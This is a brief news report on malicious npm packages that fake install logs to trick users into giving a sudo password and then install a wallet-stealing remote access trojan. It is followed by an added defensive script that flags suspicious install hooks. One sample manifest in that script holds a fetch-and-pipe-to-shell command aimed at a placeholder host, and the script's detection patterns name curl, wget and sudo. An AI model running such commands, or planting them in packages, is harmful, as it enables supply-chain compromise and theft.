
Illicit npm packages leverage bogus install logs for covert malware infections


Infosecurity Magazine reports that multiple malicious npm packages with downloader capability have displayed bogus installation logs to stealthily deliver malware that steals cryptocurrency wallets and sensitive information, as part of the new Ghost campaign, which commenced in early February. Installing the illicit packages triggers the display of fake logs, including dependency download messages, progress bars, and random delays, which aim to lure targets into providing their sudo password; that password is then used to execute a remote access trojan as the final-stage malware, according to ReversingLabs researchers. Aside from pilfering crypto wallets, other versions of the RAT also carried more comprehensive data exfiltration functionality.

Several other packages contain similar code, hinting at a potentially larger attack operation. Users of open-source packages have been urged to verify package authors and repository history, track installation scripts and atypical prompts, leverage automated security scanners, and avoid entering sudo passwords during the installation process.
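One way to act on the advice to track installation scripts, as an added example that is not code from ReversingLabs or from the packages described: it takes parsed `package.json` objects and lists every lifecycle script npm would run automatically on install. The function names, the sample manifests and the three text heuristics are assumptions chosen for illustration, not indicators from the Ghost campaign.

```javascript
// Added example: list npm lifecycle scripts that run automatically on install.
// The hook names are npm's install-time lifecycle scripts. The patterns below
// are illustrative heuristics (assumptions), not Ghost campaign signatures.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

const HEURISTICS = [
  { reason: "asks for elevated privileges", pattern: /\bsudo\b/ },
  { reason: "fetches remote content", pattern: /\b(curl|wget)\b|https?:\/\// },
  { reason: "pipes into a shell or eval", pattern: /\|\s*(sh|bash)\b|\beval\b/ },
];

// Returns one finding per install-time hook declared in a parsed package.json.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string" || command.trim() === "") continue;
    const reasons = HEURISTICS.filter((h) => h.pattern.test(command))
      .map((h) => h.reason);
    findings.push({
      package: manifest.name || "(unnamed)",
      hook,
      command,
      reasons,
      // Any install hook deserves a look; a heuristic match raises priority.
      severity: reasons.length > 0 ? "review-now" : "review",
    });
  }
  return findings;
}

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  { name: "example-clean-lib", scripts: { test: "node test.js" } },
  { name: "example-native-addon", scripts: { install: "node-gyp rebuild" } },
  { name: "example-suspicious-pkg", scripts: {
      postinstall: "node setup.js && sudo ./finish.sh",
      preinstall: "curl -s https://example.invalid/bootstrap | sh" } },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  const why = f.reasons.length ? ` (${f.reasons.join("; ")})` : "";
  console.log(`[${f.severity}] ${f.package} ${f.hook}: ${f.command}${why}`);
}
```

A finding with no matched heuristic still needs review, because the hook may call a script whose contents the manifest does not show; `npm install --ignore-scripts` installs packages without running lifecycle scripts at all.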
